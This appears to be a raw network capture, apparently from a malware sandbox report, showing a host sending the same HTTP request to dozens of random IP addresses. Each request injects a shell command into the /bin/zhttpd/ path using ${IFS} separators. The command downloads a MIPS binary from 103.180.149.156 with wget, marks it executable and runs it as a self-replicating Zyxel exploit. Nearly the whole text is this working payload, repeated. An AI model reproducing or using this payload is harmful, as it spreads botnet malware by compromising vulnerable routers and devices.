                                                        Feb 2, 2024 06:21:11.972798109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4967192.168.2.1453486168.158.80.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972852945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4968192.168.2.1452480190.169.208.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972889900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4969192.168.2.14371541.210.3.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972929001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4970192.168.2.1455118165.216.227.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972971916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4971192.168.2.1440208130.160.8.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.972995996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4972192.168.2.144083078.151.185.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973047972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4973192.168.2.1460454125.86.11.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973097086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4974192.168.2.144790866.230.80.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973134995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4975192.168.2.145000249.119.191.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973164082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4976192.168.2.145365296.192.20.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973208904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4977192.168.2.145997898.194.239.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973247051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4978192.168.2.1447318209.134.230.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973300934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4979192.168.2.1460698169.29.255.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973319054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4980192.168.2.144753461.95.196.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973341942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4981192.168.2.1446266182.114.177.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973398924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4982192.168.2.1443458118.185.44.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973427057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4983192.168.2.1442996116.133.112.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973454952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4984192.168.2.1457734151.251.60.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973493099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4985192.168.2.144511849.142.21.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973527908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4986192.168.2.14581129.180.173.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973593950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4987192.168.2.1455172195.78.7.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973628998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4988192.168.2.143454488.83.83.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973671913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4989192.168.2.1452206158.157.244.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973712921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4990192.168.2.1439406151.252.154.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973736048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4991192.168.2.1459758149.191.186.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973776102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4992192.168.2.1451984145.103.218.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973818064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4993192.168.2.144684418.46.77.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973836899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4994192.168.2.144596435.188.159.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973856926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4995192.168.2.1445900110.255.61.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973897934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4996192.168.2.146032859.118.55.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973928928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4997192.168.2.1448154112.54.49.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.973974943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4998192.168.2.1455076134.159.14.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.974019051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4999192.168.2.1433490178.146.242.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.974066019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5000192.168.2.14389209.51.92.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.974093914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5001192.168.2.1450042176.106.137.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.974136114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5002192.168.2.1457746205.56.226.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.974164963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5003192.168.2.1459796130.180.113.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.974242926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5004192.168.2.1457838177.103.122.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.974256039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5005192.168.2.1448952174.126.210.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.974314928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5006192.168.2.1455386187.98.170.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.974360943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5007192.168.2.1437222216.92.128.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.974409103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5008192.168.2.1450946105.30.6.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.974455118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5009192.168.2.14433761.38.188.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.977930069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5010192.168.2.144913852.241.60.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.977969885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5011192.168.2.145786897.216.157.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.985805988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5012192.168.2.143891064.112.252.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.985857010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5013192.168.2.14459541.168.150.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.985908031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5014192.168.2.144439031.72.142.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.985933065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5015192.168.2.143374646.47.152.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.985961914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5016192.168.2.1453984112.152.74.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986001968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5017192.168.2.1440466208.250.233.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986037016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5018192.168.2.1454298178.214.121.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986068010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5019192.168.2.144434025.8.11.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986116886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5020192.168.2.1452928209.117.53.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986172915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5021192.168.2.145495044.236.20.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986210108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5022192.168.2.143368673.21.13.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986237049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5023192.168.2.143753063.37.186.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986279011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5024192.168.2.1434620192.94.89.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986308098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5025192.168.2.145827446.99.247.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986339092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5026192.168.2.145311265.175.113.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986366034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5027192.168.2.145135436.10.5.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986402035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5028192.168.2.1441440114.9.163.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.986454964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5029192.168.2.1441610177.230.122.57443
                                                        TimestampBytes transferredDirectionData
